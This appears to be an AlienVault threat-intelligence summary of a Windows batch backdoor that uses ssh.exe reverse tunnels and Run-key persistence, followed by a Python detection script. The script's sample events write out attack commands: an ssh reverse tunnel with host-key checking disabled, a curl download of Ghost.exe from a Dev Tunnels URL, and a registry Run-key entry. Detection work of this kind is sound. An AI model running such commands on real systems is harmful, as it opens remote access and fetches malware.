A Windows batch file has been discovered that abuses the ssh.exe tool included in modern Windows versions to create a backdoor. The script adds a registry entry for persistence and uses SSH to set up a reverse tunnel that gives the operator remote access. It also downloads and executes a malicious file from a Dev Tunnels URL, a Microsoft feature similar to ngrok. The script disables SSH host key verification and enables local command execution through SSH. The specific malicious payload (Ghost.exe) is no longer available, but it is suspected to be a Remote Access Trojan (RAT). This technique demonstrates the creative misuse of legitimate tools for malicious purposes.

Author: AlienVault
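As an added illustration that is not part of the AlienVault pulse, the following Python applies simple command-line detection rules for the behaviours summarised above (ssh.exe reverse tunnel, disabled host key checking, local command execution, Run-key persistence, Dev Tunnels download) to constructed process-creation events; the rule names, regexes, severity scheme and sample command lines are assumptions made for this example.

```python
import re

# Constructed sample process-creation events (image path + command line).
# These are illustrative fixtures, not indicators from the pulse.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -o StrictHostKeyChecking=no -o PermitLocalCommand=yes "
                "-R 12345:localhost:22 relay@203.0.113.7"},
    {"image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -p 2222 deploy@build.corp.example"},
    {"image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run "
                r"/v Updater /t REG_SZ /d C:\Users\Public\update.bat /f"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c curl -o C:\\Users\\Public\\Ghost.exe "
                "https://example-tunnel-8080.euw.devtunnels.ms/Ghost.exe"},
]

# Each rule: (finding name, regex on the command line, image filename it applies to or None).
RULES = [
    ("ssh_reverse_tunnel", re.compile(r"(?:^|\s)-R\s*\S+"), "ssh.exe"),
    ("ssh_hostkey_check_disabled", re.compile(r"StrictHostKeyChecking[=\s]+no\b", re.I), "ssh.exe"),
    ("ssh_local_command_enabled", re.compile(r"PermitLocalCommand[=\s]+yes\b", re.I), "ssh.exe"),
    ("run_key_persistence", re.compile(r"\\CurrentVersion\\Run\b", re.I), "reg.exe"),
    ("devtunnels_download", re.compile(r"https?://[\w.-]+\.devtunnels\.ms/", re.I), None),
]

def analyse_event(event):
    """Return the finding names (in RULES order) that match one process-creation event."""
    image_name = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    return [name for name, rx, image in RULES
            if (image is None or image == image_name) and rx.search(cmd)]

def severity(findings):
    """Two or more ssh.exe findings, or any Dev Tunnels download, is rated high;
    a single finding is rated medium; no finding returns None."""
    ssh_hits = sum(f.startswith("ssh_") for f in findings)
    if ssh_hits >= 2 or "devtunnels_download" in findings:
        return "high"
    return "medium" if findings else None

def triage(events):
    """Map each suspicious command line to (severity, findings); benign events are dropped."""
    out = {}
    for ev in events:
        found = analyse_event(ev)
        if found:
            out[ev["cmdline"]] = (severity(found), found)
    return out

if __name__ == "__main__":
    for cmd, (sev, found) in triage(SAMPLE_EVENTS).items():
        print(f"[{sev}] {', '.join(found)} :: {cmd}")
```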
Related Tags:
T1021.004
T1547.001
SSH
T1572
T1059.003
T1571
T1105
AlienVault OTX
AlienVault
Associated Indicators: none